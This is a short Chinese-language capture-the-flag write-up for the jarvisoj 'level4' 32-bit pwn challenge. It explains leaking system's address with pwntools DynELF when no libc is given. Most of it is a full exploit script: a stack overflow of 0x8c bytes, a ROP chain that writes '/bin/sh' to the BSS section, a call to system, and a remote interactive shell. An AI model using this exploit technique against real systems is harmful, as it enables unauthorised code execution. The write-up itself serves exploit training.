当题目不提供libc时,可以通过DynELF泄露system的地址
例题level4(32位)
题目逻辑很简单就是通过read函数输入write函数进行输出
read长度限制为0x100,然而需要栈溢出只需要0x8c
查一下保护
题目就很简单了,直接进行DynELF获取system地址,使用read函数在BSS段输入"/bin/sh\x00"
from pwn import *
p=remote('pwn2.jarvisoj.com',9880)
def leak(addr):
payload='A'*0x8c
payload+=p32(0x08048340)#write function
payload+=p32(0x0804844b)#retn
payload+=p32(1)
payload+=p32(addr)
payload+=p32(4)
p.send(payload)
leaked=p.recv(4)
return leaked
d=DynELF(leak,elf=ELF("./level4"))
system_addr=d.lookup('system','libc')
payload='a'*0x8c
payload+=p32(0x08048310)#read
payload+=p32(0x08048509)#retn balance stack
payload+=p32(0)
payload+=p32(0x0804a024)#readelf -S level4 bss_addr
payload+=p32(8)
payload+=p32(system_addr)
payload+=p32(0xdeadbeef)
payload+=p32(0x0804a024)
p.send(payload)
p.send("/bin/sh\x00")
p.interactive()
